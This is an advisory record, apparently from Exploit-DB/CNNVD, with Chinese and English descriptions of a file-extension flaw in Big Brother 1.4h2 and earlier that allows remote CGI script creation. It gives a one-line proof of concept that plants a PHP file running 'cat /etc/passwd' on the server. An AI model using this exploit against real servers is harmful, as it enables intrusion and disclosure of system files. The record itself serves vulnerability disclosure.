https://www.exploit-db.com/exploits/20092
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-052

BigBrother1.4h2版本和更早的版本的默认配置不包含正确的访问限制。远程攻击者通过使用bbd上传文件可以执行任意命令，该文件的扩展导致其被web服务器当做CGI脚本执行。

source: http://www.securityfocus.com/bid/1494/info

A vulnerability in Big Brother exists which would allow a user to remotely create CGI scripts which could be requested from the Web Server. These could be used to read files and possibly execute commands on the web server machine. 

./bb 1.2.3.4 "status evil.php3 <?<system("cat /etc/passwd");?>"

will allow viewing of the /etc/passwd upon browsing to http://1.2.3.4/bb/logs/evil.php3.

来源:BUGTRAQ
名称:20000711BigBrotherfilenameextensionvulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2000-07/0171.html
来源:BID
名称:1494
链接:http://www.securityfocus.com/bid/1494
来源:XF
名称:big-brother-filename-extension
链接:http://xforce.iss.net/static/5103.php
来源:OSVDB
名称:1472
链接:http://www.osvdb.org/1472